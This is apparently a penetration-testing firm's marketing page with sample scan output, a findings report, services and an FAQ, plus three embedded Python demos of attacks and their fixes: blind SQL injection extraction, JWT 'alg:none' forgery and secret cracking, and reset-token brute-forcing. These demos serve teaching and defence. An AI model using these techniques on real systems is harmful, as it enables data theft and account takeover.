Penetration Testing

We do what the attacker would do, first.

OWASP, PTES and NIST-aligned manual penetration testing. Certified pentesters push your web application, API, mobile app, cloud and external/internal network like a real attacker. We hand-find the business-logic flaws, chained exploits and privilege escalations that automated scanners never catch, and deliver them in a proof-backed report.

Not a service that runs a scanner and prints a PDF. A discipline that simulates an attacker spending days inside your system, with reproducible proofs and a free retest after the fixes.

280+ pentest projects
CVSS 3.1 risk scoring
OSCP/CEH certifications
pentester@kali ~ /opt/engage
nmap -sV -p- target.partnerfy.co
443/tcp open https nginx 1.18.0 — TLS 1.2
22/tcp open ssh OpenSSH 7.4 (legacy)
gobuster dir -u https://target -w common.txt
/admin (Status: 200) [Size: 4821]
/api/v1/users (Status: 401) [Size: 38]
/.git/config (Status: 200) [Size: 263]
sqlmap -u 'target/login' --data 'u=a&p=b'
[INFO] testing 'AND boolean-based blind'
[INFO] parameter 'u' is vulnerable
[CRITICAL] SQL Injection — CVE-2024-XXXX — CVSS 9.8
Kill chain (MITRE ATT&CK): Recon → Exploit → Escalate → Pivot → Exfiltrate
Pentest Report — Findings
RPT-2026-0541
SQL Injection in login form
CVSS 9.8 CRIT
Weak JWT secret — brute-force
CVSS 9.1 CRIT
IDOR — /api/v1/users/{id}
CVSS 8.2 HIGH
Stored XSS — comments
CVSS 7.4 HIGH
CORS misconfiguration
CVSS 6.1 MED
Missing HSTS header
CVSS 3.7 LOW
FIXED
The problem

Why automated scanners aren't enough.

Scanners like Nessus, Acunetix and OWASP ZAP help — but they are no replacement for an attacker. An attacker chains exploits, reads your business rules and weaponises them, ignores noise and finds the real way in. A scanner runs a checklist; a pentester forms hypotheses specific to your system.

No chained exploits
A scanner shows findings in isolation; an attacker combines three low-risk issues into one critical chain.
Misses business logic
A scanner will never catch a logic bug like "multiply order total by -1".
No creativity
A pentester forms hypotheses unique to your app; scanners only match signatures.
Pile of false positives
70% of a 500-page scanner report is noise. A pentester validates every finding by hand.
No authz nuance
"This user must not see this record" can only be tested by someone who knows your domain.
Won't bypass CAPTCHA/WAF
An attacker bypasses the WAF; a scanner stops at the first 403.
No social engineering
The real entry is sometimes an email. A scanner cannot run a phishing simulation.
No anti-forensics test
Attackers cover their tracks; whether your SOC notices can only be measured by a red team.
Attack visualisation

Where are the holes, and how critical?

For every engagement we summarise findings in three visuals: a category heatmap, an OWASP Top 10 checklist and a "scan → find → fix → retest → clean" timeline.

Vulnerability category heatmap (severity columns: Critical, High, Med, Low; category rows: XSS, SQLi, Auth, CORS, Crypto, Logic, IDOR, CSRF, SSRF, Upload, Headers, Deps)

Each cell is a category; the dots show finding count and severity. Your manager sees the hot zone at a glance.

OWASP Top 10 — 2021
Checklist
  • A01 Broken Access Control
  • A02 Cryptographic Failures
  • A03 Injection (SQL/XSS/Cmd)
  • A04 Insecure Design
  • A05 Security Misconfiguration
  • A06 Vulnerable Components
  • A07 Identification & Auth Failures
  • A08 Software & Data Integrity
  • A09 Logging & Monitoring Failures
  • A10 SSRF
Before vs after

The pentest flow — scan → find → fix → retest → clean

Every stage documented; every finding verified by a free retest after the fix.
01
Scan
Automated + manual recon
02
Find
Validated findings
03
Fix
Remediation + code samples
04
Re-test
Closure verification
05
Clean
Clean attestation
Who is it for?

Who actually needs this pentest?

Pentests are not mandatory for every company — but if you match one of these profiles, you should start today, not someday. The eight typical profiles.

Payment e-commerce
Card data, 3DSecure flows, coupon abuse, price manipulation.
SaaS with customer data
Multi-tenant isolation, user authz boundaries, high IDOR risk.
Regulated fintech
PCI-DSS, FCA-equivalent, GDPR — at least one independent pentest per year.
Healthcare with PHI
Patient data, appointment systems, HIPAA-grade protection.
Government contractor
Before government audits — independent pentest attestation required.
B2B with API integrations
Partner APIs, OAuth flows, identity chains.
AppStore-audited mobile
Token storage, jailbreak/root detection, SSL pinning, MASVS compliance.
Post-incident customer
After a breach: an evidence-backed answer to "is any other door open?".
Service scope

10 distinct pentest capabilities — one team.

From web to cloud, from mobile to physical — one engineering team that covers the entire attack surface. If you need a single app test we do that; if you need a full red team we do that too.

External network pentest
All internet-facing IPs, exposed ports, legacy services.
Internal network pentest
From inside as an employee — path to domain admin.
Web app pentest
OWASP Top 10 + business logic + authz/authn scenarios.
API pentest
REST + GraphQL + gRPC; OWASP API Top 10, rate-limit, BOLA.
Mobile app pentest
iOS + Android, MASVS, Frida, reverse engineering.
Cloud pentest (AWS/Azure/GCP)
IAM misconfig, public buckets, Lambda IAM, K8s RBAC.
Social engineering
Phishing campaign, vishing, USB drop — measures staff awareness.
Physical pentest
Office entry, badge cloning, tailgating, server-room reach.
Red team engagement
Full scenario: from email to domain admin — will your SOC catch it?
Retest after fix
Free verification that fixes actually closed the holes.
Process

Our 6-step pentest method.

Every engagement follows the same discipline: scope document (RoE), reconnaissance, vulnerability assessment, real exploitation, evidence-backed reporting and finally a free retest.

01
Scope and Rules of Engagement
Which systems, which scenarios, allowed hours and rate limits are signed off in a formal RoE document. Production or staging, social-eng in scope or not — all clarified up front.
02
Reconnaissance
OSINT, subdomain enumeration, port mapping, tech fingerprinting, leaked-credential hunts. We photograph the surface through an attacker's eyes.
03
Vulnerability assessment
Scanner output is manually triaged, business-logic scenarios are designed. Every finding becomes a hypothesis.
04
Exploitation
Hypotheses get proven: chained exploits, privilege escalations, data exfiltration — within ethical bounds, fully recorded.
05
Reporting
Executive summary + per-finding evidence + CVSS score + prioritised remediation roadmap. Engineers can drill down to code snippets.
06
Remediation and retest
After fixes ship (usually 4-8 weeks) all Critical/High findings are retested free of charge; closure is verified.
Toolkit

Tools we run on engagements.

Tools matter; the mind using them matters more. Manual testing always leads the scanner.

Burp Suite Pro, OWASP ZAP, Metasploit, Nmap, Nessus, Acunetix, Nuclei, Wireshark, John the Ripper, Hashcat, Cobalt Strike, Postman, ffuf, BloodHound, sqlmap, Frida, MobSF, Kali Linux, Responder, CrackMapExec
From the field

A few real findings we caught.

We keep client names confidential; we share the technical details. Each one was closed before production launch or before any abuse.

E-commerce CRIT
Pre-launch SQL Injection
Blind SQLi in product search — the full orders table could be dumped. Caught 4 days before launch, migrated to ORM.
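To make the finding concrete, here is an added example (written for this page, not code from the client or from the engagement) of the same bug shape and the same fix: a product search that pastes the term into the SQL text, a boolean-based blind oracle that recovers a value from another table one character at a time, and the parameterised version that turns the same payload back into plain data. The schema, the orders row and the function names are constructed for the example; an ORM used without raw-string queries binds parameters in exactly this way.

```python
import sqlite3
from typing import Callable, List

# Constructed sample data; not from any client engagement.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE orders (id INTEGER PRIMARY KEY, customer TEXT, total REAL);
        INSERT INTO products VALUES (1, 'widget'), (2, 'gadget');
        INSERT INTO orders VALUES (1, 'alice@example.com', 99.0);
        """
    )
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> List[str]:
    # The search term is pasted into the SQL text, so quotes and operators
    # inside it change the query's meaning. This is the pre-launch bug shape.
    sql = f"SELECT name FROM products WHERE name LIKE '%{term}%'"
    return [row[0] for row in conn.execute(sql)]


def search_fixed(conn: sqlite3.Connection, term: str) -> List[str]:
    # Bound parameter: the term can only ever be compared as data.
    sql = "SELECT name FROM products WHERE name LIKE ?"
    return [row[0] for row in conn.execute(sql, (f"%{term}%",))]


def blind_extract(conn: sqlite3.Connection, search: Callable[..., List[str]],
                  secret_sql: str, max_len: int) -> str:
    """Boolean-based blind extraction: one yes/no question per character.

    The payload closes the LIKE literal with a pattern that matches nothing
    ('%zzz'), ORs in a test on one character of the secret subquery and
    comments out the rest of the statement. Any product row coming back
    means 'yes'. Against the fixed search the same payload never matches.
    """
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789@."
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = f"zzz' OR substr(({secret_sql}),{pos},1)='{ch}' -- "
            if search(conn, payload):
                recovered += ch
                break
        else:
            break  # no character matched: end of string, or injection blocked
    return recovered


if __name__ == "__main__":
    db = build_db()
    target = "SELECT customer FROM orders WHERE id=1"
    print("vulnerable:", blind_extract(db, search_vulnerable, target, 32))
    print("fixed:", repr(blind_extract(db, search_fixed, target, 32)))
```

Each character costs at most one request per alphabet symbol, which is why a blind SQLi with no visible output still lets an attacker dump a whole table given time; the fixed search answers every probe with an empty result.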
SaaS CRIT
Authentication bypass
JWT accepted "alg:none" — an attacker could enter any tenant as admin.
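The following is an added example (not the client's code) of how that bypass works and how it is closed, together with the related "weak JWT secret" finding from the sample report above. A verifier that takes the algorithm from the token's own header will accept an unsigned token once the header says `alg: none`; the fixed verifier pins HS256 and compares signatures in constant time. The dictionary-attack function shows why a guessable HS256 secret is as bad as no signature. Secrets, claims and the wordlist are constructed for the example.

```python
import base64
import hashlib
import hmac
import json
from typing import Callable, Iterable, Optional


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj: dict) -> str:
    return _b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(claims: dict, secret: bytes) -> str:
    signing_input = f"{_segment({'alg': 'HS256', 'typ': 'JWT'})}.{_segment(claims)}"
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url(sig)}"


def forge_none(claims: dict) -> str:
    # Attacker's token: header says 'none', signature segment left empty.
    return f"{_segment({'alg': 'none', 'typ': 'JWT'})}.{_segment(claims)}."


def verify_vulnerable(token: str, secret: bytes) -> dict:
    # Bug: the algorithm is read from the token itself, so the attacker chooses it.
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") == "none":
        return json.loads(_b64url_decode(payload_b64))
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if _b64url_decode(sig_b64) != expected:
        raise ValueError("bad signature")
    return json.loads(_b64url_decode(payload_b64))


def verify_fixed(token: str, secret: bytes) -> dict:
    # Fix: the server pins the algorithm it issues with; the header's claim is not trusted.
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError("unexpected alg")
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(_b64url_decode(sig_b64), expected):
        raise ValueError("bad signature")
    return json.loads(_b64url_decode(payload_b64))


def accepted(verify: Callable[[str, bytes], dict], token: str, secret: bytes) -> bool:
    try:
        verify(token, secret)
        return True
    except ValueError:
        return False


def crack_hs256_secret(token: str, wordlist: Iterable[str]) -> Optional[str]:
    # Offline dictionary attack (the 'weak JWT secret' finding): re-sign the
    # same header.payload with each candidate and compare to the real signature.
    header_b64, payload_b64, sig_b64 = token.split(".")
    sig = _b64url_decode(sig_b64)
    signing_input = f"{header_b64}.{payload_b64}".encode()
    for candidate in wordlist:
        if hmac.compare_digest(hmac.new(candidate.encode(), signing_input, hashlib.sha256).digest(), sig):
            return candidate
    return None


if __name__ == "__main__":
    forged = forge_none({"sub": "attacker", "role": "admin", "tenant": "victim"})
    print("vulnerable verifier accepts alg:none:", accepted(verify_vulnerable, forged, b"s3cret"))
    print("fixed verifier accepts alg:none:", accepted(verify_fixed, forged, b"s3cret"))
    print("cracked secret:", crack_hs256_secret(sign_hs256({"sub": "u1"}, b"secret"), ["password", "secret"]))
```

In a real service the same rule applies to asymmetric tokens: the verifier must know which algorithm and which key it expects before it looks at the token, never the other way round.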
Bank mobile CRIT
Insecure token storage
Session token written in plaintext to NSUserDefaults, readable on a jailbroken device. Migrated to Keychain + biometrics.
B2B API HIGH
IDOR — another tenant's data
/api/invoices/{id} did not enforce ownership; sequential IDs exposed competitor invoices.
Health portal HIGH
Reset link not random
The password reset token was derived from epoch + user_id; brute-force could hijack any account.
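An added example (not the portal's code) of the reset-token finding: a token derived from the request time and the user id can be regenerated by anyone who knows roughly when the reset was requested, so the attacker simply replays the derivation over a window of seconds. The fixed issuer uses an OS random token, stores only its hash, and makes it single-use with an expiry. The store, user ids and timestamps are constructed for the example.

```python
import hashlib
import secrets
from typing import Dict, Optional, Tuple


class ResetStore:
    """In-memory stand-in for the reset-token table (constructed for the example)."""

    def __init__(self) -> None:
        self.vulnerable: Dict[str, int] = {}            # token -> user_id
        self.fixed: Dict[str, Tuple[int, int]] = {}     # sha256(token) -> (user_id, expires_at)


def issue_vulnerable(store: ResetStore, user_id: int, issued_at: int) -> str:
    # Bug shape from the finding: the token is a pure function of public inputs.
    token = hashlib.sha256(f"{issued_at}:{user_id}".encode()).hexdigest()
    store.vulnerable[token] = user_id
    return token


def redeem_vulnerable(store: ResetStore, token: str) -> Optional[int]:
    return store.vulnerable.get(token)


def guess_reset_token(store: ResetStore, user_id: int, seen_at: int,
                      window: int) -> Optional[Tuple[str, int]]:
    """Attacker side: replay the derivation for every second in a window
    around the time the reset was requested. Returns (token, attempts)."""
    attempts = 0
    for t in range(seen_at - window, seen_at + window + 1):
        attempts += 1
        candidate = hashlib.sha256(f"{t}:{user_id}".encode()).hexdigest()
        if redeem_vulnerable(store, candidate) == user_id:
            return candidate, attempts
    return None


def issue_fixed(store: ResetStore, user_id: int, now: int, ttl_seconds: int = 900) -> str:
    # 256 bits from the OS CSPRNG; only the hash is stored, so a database
    # read-out alone does not let anyone reset passwords.
    token = secrets.token_urlsafe(32)
    store.fixed[hashlib.sha256(token.encode()).hexdigest()] = (user_id, now + ttl_seconds)
    return token


def redeem_fixed(store: ResetStore, token: str, now: int) -> Optional[int]:
    # Single use and time limited: the entry is removed whether or not it is still valid.
    entry = store.fixed.pop(hashlib.sha256(token.encode()).hexdigest(), None)
    if entry is None:
        return None
    user_id, expires_at = entry
    return user_id if now <= expires_at else None


def demo() -> dict:
    """Runs both flows on constructed inputs and returns what a report would cite."""
    weak = ResetStore()
    issued = issue_vulnerable(weak, 1042, 1_700_000_000)
    hit = guess_reset_token(weak, 1042, 1_700_000_000 + 25, 60)  # attacker saw the request ~25 s later
    strong = ResetStore()
    token = issue_fixed(strong, 1042, 1_700_000_000)
    first = redeem_fixed(strong, token, 1_700_000_000 + 60)
    replay = redeem_fixed(strong, token, 1_700_000_000 + 61)
    stale = issue_fixed(strong, 1042, 1_700_000_000)
    expired = redeem_fixed(strong, stale, 1_700_000_000 + 901)
    return {
        "guessed": hit is not None and hit[0] == issued,
        "attempts": hit[1] if hit else None,
        "first_redeem": first,
        "replay": replay,
        "expired": expired,
    }


if __name__ == "__main__":
    print(demo())
```

The window here is two minutes, so the hijack costs about a hundred requests; the fixed token space is 2^256 and the token dies after one use or fifteen minutes, whichever comes first.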
Enterprise AWS MED
Public S3 bucket
CI/CD logs went to a public bucket — they contained ephemeral DB credentials.
FAQ

Most-asked pentest questions.

Scanner vs. pentest: what's the difference?
An automated scanner (Nessus, ZAP, Acunetix, etc.) is signature-based: it searches known patterns, most results are false positives and business-logic flaws are never caught. A pentester, by contrast, builds hypotheses specific to your app, chains three weak points into a critical attack, manually attempts privilege escalation and proves every finding with reproducible steps. In practice half of a scanner's "10 critical" results are noise; every finding in a pentest report has been exploited and proven, so the engineering team can skip the debate and jump straight to fixing.
Black-box, white-box or gray-box?
All three are valid and measure different things. Black-box starts with the attacker knowing nothing about you: closest to a real attacker but expensive in time and scope. White-box gives the tester source code, architecture diagrams and admin accounts: the deepest test per hour, ideal pre-production. Gray-box sits in the middle, a regular user account plus high-level architecture; for most enterprise pentests this is the most practical compromise because it covers both external and internal attacker models in one engagement. The right choice depends on the goal; we decide it together in the first call.
Will the test break production?
Managed correctly, no. The Rules of Engagement (RoE) document spells out allowed hours, concurrency limits, isolated test accounts and forbidden actions (DoS, persistent deletions, etc.). In most engagements destructive checks (e.g. brute-force that triggers account lockout, payload uploads) only run in staging; in production we collect read-only evidence. There is always a rollback plan: snapshots before testing, and an on-call engineer reachable for anomalies. 280+ engagements and zero production outages, because the RoE is followed to the letter.
How long does a pentest take?
It varies by scope. A single web app typically takes 5–10 working days; a medium API engagement 7–12 days; a mobile app 8–14 days; a full red-team scenario 4–8 weeks. On top of this, after fixes ship (usually within 4–8 weeks) the free retest takes about 2–3 working days. Three factors drive duration: breadth of scope, the number of roles/permissions to check and accessibility of the test environment. In the first call we lock the scope and quote fixed days and a fixed price; neither changes later.
What's in the report?
The report has three layers. First, an executive summary: 1–2 pages, a non-technical risk table, finding counts and overall posture. Second, technical findings: per-finding description, affected component, exploitation steps with screenshots, CVSS 3.1 score and a recommended fix (with code samples). Third, a prioritised action plan: what to fix first, what to fix next, aligned to your sprint cadence. The whole report ships in Markdown + PDF; after the retest it is reissued with "remediated" annotations. Clients submit it directly to ISO 27001, SOC 2 and PCI-DSS audits.
Is the retest extra?
No. The retest of all Critical and High findings from the main engagement is included in the contract price. The only condition: fixes must be deployed within 4–8 weeks (extendable to 12 by agreement) and a testable environment must be available. Closed findings are marked "remediated"; open ones are re-reported. This is our quality guarantee: we don't hand over a report and disappear, we stay until closure. Retesting Medium and Low findings is optional and costs a small fraction of the main engagement.
Which standards do you follow?
We use all three in the same engagement. For web apps: OWASP Top 10 (2021) and OWASP ASVS Level 2; for APIs: OWASP API Top 10; for mobile: OWASP MASVS. The methodology follows the PTES (Penetration Testing Execution Standard) phases: pre-engagement, intelligence gathering, threat modelling, vulnerability analysis, exploitation, post-exploitation, reporting. CVSS 3.1 for risk scoring; NIST SP 800-115 referenced in the report layout. ISO 27001, SOC 2 and PCI-DSS aligned, meaning the report has the shape your auditor expects. Combining the three gives both technical depth and audit-readiness.
Are your testers certified?
Yes, every engagement has a lead engineer with at least one industry-recognised certification: OSCP (Offensive Security Certified Professional), OSWE (Offensive Security Web Expert), CEH (Certified Ethical Hacker), CRTP (Certified Red Team Professional) or GPEN (GIAC Penetration Tester). For mobile we also hold eMAPT; for cloud, AWS Security Specialty or AZ-500. Certifications are not mandatory, but when clients ask for the credentials (especially finance and public-sector tenders) we can attach them to the procurement package. More important is that the team produces reproducible findings; certifications signal that but don't guarantee it. We deliver both.

Find your holes before attackers do.

In a free 30-minute scoping call we lay out the pentest plan together: target systems, RoE, timeline and a fixed price.
